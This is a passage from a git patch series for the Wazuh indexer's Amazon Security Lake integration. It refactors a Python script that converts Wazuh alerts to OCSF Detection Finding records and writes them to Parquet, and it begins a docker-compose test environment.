"Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.types" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } }, - "mappings": + "1.1.0": { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.type" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" + "constants": + { + "activity_id" : 1, + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "finding_info.analytic.type" : "Rule", + "finding_info.analytic.type_id" : 1, + "finding_info.attacks.version" : "v13.1", + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "count" : "rule.firedtimes", + "finding_info.analytic.category" : "rule.groups", + "finding_info.analytic.name" : "decoder.name", + "finding_info.analytic.uid" : "rule.id", + "finding_info.attacks.tactic" : "rule.mitre.tactic", + "finding_info.attacks.technique" : "rule.mitre.technique", + "finding_info.title" : "rule.description", + "finding_info.types" : "input.type", + "finding_info.uid" : "id", + "message" : "rule.description", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } } } diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 09fba3ad554d4..5efb9da83bb80 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,13 +13,13 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output): +def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): ocsf_output = {} ### Put constants into the output alert - ocsf_output |= mappings['constants'] + ocsf_output |= mappings[ocsfschema]['constants'] - for key in mappings['mappings']: - dotted_destination_field = mappings['mappings'].get(key) + for key in mappings[ocsfschema]['mappings']: + dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) depth_levels = dotted_destination.split('.') current_level = alert_dictionary[depth_levels[0]] if len(depth_levels>1): @@ -51,7 +51,7 @@ def map_block(fileobject, length, mappings): alert = json.loads(line) ocsf_mapped_alert = {} map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -66,6 +66,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') @@ -95,7 +96,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings) + current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From e313572485453506a8dda93711e0168bbcd2dec5 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:19:31 -0300 Subject: [PATCH 40/77] Use custom ocsf module to map alerts --- .../stdin_to_securitylake.py | 38 ++++++++++--------- 1 file changed, 20 insertions(+), 18 deletions(-) rename integrations/{ => amazon-security-lake}/stdin_to_securitylake.py (84%) diff --git a/integrations/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py similarity index 84% rename from integrations/stdin_to_securitylake.py rename to integrations/amazon-security-lake/stdin_to_securitylake.py index 5efb9da83bb80..21374d85ee0ad 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -9,26 +9,28 @@ from datetime import datetime from pyarrow import parquet, Table, fs +import ocsf + block_ending = { "block_ending": True } s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): - ocsf_output = {} - ### Put constants into the output alert - ocsf_output |= mappings[ocsfschema]['constants'] - - for key in mappings[ocsfschema]['mappings']: - dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) - depth_levels = dotted_destination.split('.') - current_level = alert_dictionary[depth_levels[0]] - if len(depth_levels>1): - for field in depth_levels[1:]: - current_level = current_level[field] - ocsf_output[key] = current_level - ### We probably need to crop the fields we already - ### mapped to OCSF from ocsf_output - ocsf_output['unmapped'] = alert_dictionary +#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): +# ocsf_output = {} +# ### Put constants into the output alert +# ocsf_output |= mappings[ocsfschema]['constants'] +# +# for key in mappings[ocsfschema]['mappings']: +# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) +# depth_levels = dotted_destination.split('.') +# current_level = alert_dictionary[depth_levels[0]] +# if len(depth_levels>1): +# for field in depth_levels[1:]: +# current_level = current_level[field] +# ocsf_output[key] = current_level +# ### We probably need to crop the fields we already +# ### mapped to OCSF from ocsf_output +# ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -49,8 +51,8 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = {} - map_to_ocsf(alert, mappings, ocsf_mapped_alert): + ocsf_mapped_alert = ocsf.convert(alert) + #map_to_ocsf(alert, mappings, ocsf_mapped_alert): output.append(ocsf_mapped_alert) return output From 4896d159912cdfc627e52eba2ebac3f5790d541e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:53:40 -0300 Subject: [PATCH 41/77] Modify script to use converter class --- .../amazon-security-lake/ocsf/converter.py | 40 ++++++++--------- .../stdin_to_securitylake.py | 45 +++++++++---------- 2 files changed, 42 insertions(+), 43 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index fba84e7304dc7..2a14b75957c97 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,30 +27,30 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], "finding_info": { "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], "type_id": 1, - "uid": event["_source"]["rule"]["id"], + "uid": event["rule"]["id"], }, "attacks": { "tactic": { - "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "name": join(event["rule"]["mitre"]["tactic"]), }, "technique": { - "name": join(event["_source"]["rule"]["mitre"]["technique"]), - "uid": join(event["_source"]["rule"]["mitre"]["id"]), + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), }, "version": "v13.1" }, - "title": event["_source"]["rule"]["description"], + "title": event["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + event["input"]["type"] ], - "uid": event["_source"]['id'] + "uid": event['id'] }, "metadata": { "log_name": "Security events", @@ -62,25 +62,25 @@ def convert(event: dict) -> dict: }, "version": "1.1.0", }, - "raw_data": event["_source"]["full_log"], + "raw_data": event["full_log"], "resources": [ { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "name": event["agent"]["name"], + "uid": event["agent"]["id"] }, ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), "status_id": 99, - "time": event["_source"]["timestamp"], + "time": event["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + event["location"], + event["manager"]["name"] ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "nist": event["rule"]["nist_800_53"], # Array } } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 21374d85ee0ad..49926a8aa1d64 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -6,10 +6,10 @@ import logging import time import json -from datetime import datetime +import datetime from pyarrow import parquet, Table, fs -import ocsf +from ocsf import converter block_ending = { "block_ending": True } @@ -43,7 +43,7 @@ def encode_parquet(list,bucket_name,folder): table = Table.from_pylist(list) parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def map_block(fileobject, length, mappings): +def map_block(fileobject, length): output=[] for line in range(0, length): line = fileobject.readline() @@ -51,44 +51,41 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = ocsf.convert(alert) + ocsf_mapped_alert = converter.convert(alert) #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): - current_time = datetime.now(tz='UTC') + current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() -def parse_arguments(): + +if __name__ == "__main__": + clock = datetime.datetime.now(datetime.timezone.utc) + clockstr = clock.strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - debugging = parser.add_argument_group('debugging') - debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') - debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') args = parser.parse_args() - -if __name__ == "__main__": - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H.%M.%S') - parse_arguments() - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) + #with open(ocsf_mapping_filename) as jsonfile: + # mappings = json.loads(jsonfile.read()) - with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) try: while True: @@ -98,14 +95,14 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) + current_block = map_block(stdin, args.linebuffer ) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] output_buffer.append(current_block) @@ -117,4 +114,6 @@ def parse_arguments(): except Exception as e: logging.error("Error running script") + logging.error(e) + raise exit(1) From 7fd25d1213e605ceac965eb3eb31395c05072b3f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:28:51 -0300 Subject: [PATCH 42/77] Code polish and fix errors --- .../amazon-security-lake/ocsf/converter.py | 152 +++++++++--------- .../stdin_to_securitylake.py | 87 +++------- 2 files changed, 102 insertions(+), 137 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index 2a14b75957c97..c927afa8fe87f 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -1,87 +1,89 @@ -#!/usr/bin/python +#!/usr/bin/python3 # event comes from Filebeat -event = {} - +#event = {} +#print(event) def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level def join(iterable, separator=","): - return (separator.join(iterable)) + return (separator.join(iterable)) def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "dummy": True + }, + "technique": { + #"name": join(event["_source"]["rule"]["mitre"]["technique"]), + #"uid": join(event["_source"]["rule"]["mitre"]["id"]), + "dummy": True + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + #"raw_data": event["_source"]["full_log"], + "resources": [ { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + #event["_source"]["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + #"nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } - return ocsf_class_template + return ocsf_class_template diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 49926a8aa1d64..4fdecc14c073e 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python3 +#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 import os import sys @@ -7,44 +7,18 @@ import time import json import datetime -from pyarrow import parquet, Table, fs - +from pyarrow import parquet, Table from ocsf import converter block_ending = { "block_ending": True } -s3 = fs.S3FileSystem() - -#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): -# ocsf_output = {} -# ### Put constants into the output alert -# ocsf_output |= mappings[ocsfschema]['constants'] -# -# for key in mappings[ocsfschema]['mappings']: -# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) -# depth_levels = dotted_destination.split('.') -# current_level = alert_dictionary[depth_levels[0]] -# if len(depth_levels>1): -# for field in depth_levels[1:]: -# current_level = current_level[field] -# ocsf_output[key] = current_level -# ### We probably need to crop the fields we already -# ### mapped to OCSF from ocsf_output -# ocsf_output['unmapped'] = alert_dictionary - -def encode_parquet(list,bucket_name,folder): - ### We can write directly to S3 from pyarrow: - ### https://arrow.apache.org/docs/python/filesystems.html#s3 - ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream - ### - ### Credentials can be stored in ~/.aws/credentials - ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html - +def encode_parquet(list,foldername,filename): table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) def map_block(fileobject, length): output=[] + ocsf_mapped_alert = {} for line in range(0, length): line = fileobject.readline() if line == '': @@ -52,36 +26,28 @@ def map_block(fileobject, length): break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) - #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() - if __name__ == "__main__": - clock = datetime.datetime.now(datetime.timezone.utc) - clockstr = clock.strftime('%F_%H.%M.%S') + date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') - parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') - parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') - parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') - parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - #with open(ocsf_mapping_filename) as jsonfile: - # mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] @@ -89,22 +55,20 @@ def get_elapsedseconds(reference_timestamp): try: while True: - ### We can possibly replace all the custom code here - ### and just use Arrow's built-in input and output facilities: - ### * https://arrow.apache.org/docs/python/memory.html#input-and-output - ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas - ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - - current_block = map_block(stdin, args.linebuffer ) - if current_block[-1] == block_ending : - output_buffer += current_block[0:current_block.index(block_ending)] - time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.bucketname,args.foldername) + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] - output_buffer.append(current_block) + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") @@ -116,4 +80,3 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise - exit(1) From e06203c32c3bbac39639abe4ff8819ed90663e7e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:38:53 -0300 Subject: [PATCH 43/77] Remove unnecessary type declaration from debug flag --- integrations/amazon-security-lake/stdin_to_securitylake.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 4fdecc14c073e..b8fa6c17bbf4c 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -36,7 +36,7 @@ def get_elapsedseconds(reference_timestamp): if __name__ == "__main__": date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') From 6826e127a60ef34551349dff86a0a6cc11816637 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 17:00:15 -0300 Subject: [PATCH 44/77] Improved parquet encoding --- .../stdin_to_securitylake.py | 29 ++++++++++++------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index b8fa6c17bbf4c..ec90025d9afa3 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 +#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 import os import sys @@ -13,8 +13,13 @@ block_ending = { "block_ending": True } def encode_parquet(list,foldername,filename): - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + try: + table = Table.from_pylist(list) + print(table) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + except Exception as e: + logging.error(e) + raise def map_block(fileobject, length): output=[] @@ -44,7 +49,8 @@ def get_elapsedseconds(reference_timestamp): parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: @@ -55,12 +61,6 @@ def get_elapsedseconds(reference_timestamp): try: while True: - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] current_block = map_block( stdin, args.linebuffer ) @@ -70,6 +70,15 @@ def get_elapsedseconds(reference_timestamp): else: output_buffer += current_block + if len(output_buffer) == 0: + continue + + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + logging.info('Writing data to parquet file') + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + starttimestamp = datetime.datetime.now(datetime.timezone.utc) + output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) From 9cfc24786cd96d6c4f239e3d4e64db0475299c12 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 15:38:04 -0300 Subject: [PATCH 45/77] Initial commit for test env's docker-compose.yml --- .../stdin_to_securitylake.py | 1 - integrations/docker/docker-compose.yml | 117 ++++++++++++++++++ 2 files changed, 117 insertions(+), 1 deletion(-) create mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ec90025d9afa3..eee82036c3ff5 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -15,7 +15,6 @@ def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - print(table) parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) except Exception as e: logging.error(e) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml new file mode 100644 index 0000000000000..ebd6b348c5116 --- /dev/null +++ b/integrations/docker/docker-compose.yml @@ -0,0 +1,117 @@ +version: "3.8" + +services: + + events-generator: + image: events-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y python3-requests + container_name: events-generator + volumes: + - ../tools/events-generator:/home/events-generator + hostname: events-generator + working_dir: "/home/events-generator" + entrypoint: sh -c "python3 run.py" + networks: + wazuh-indexer-dev: + aliases: + - events-generator + ipv4_address: 172.18.0.2 + depends_on: + - wazuh-indexer + + wazuh-indexer: + image: wazuh/wazuh-indexer:4.8.0-beta1 + container_name: wazuh-indexer + hostname: wazuh-indexer + restart: always + networks: + wazuh-indexer-dev: + aliases: + - wazuh-indexer + ipv4_address: 172.18.0.3 + ports: + - "9222:9200" + depends_on: + - generator + environment: + - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" + - "bootstrap.memory_lock=true" + - 'INDEXER_PASSWORD=SecretPassword' + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - ./wazuh-indexer-data:/var/lib/wazuh-indexer + - 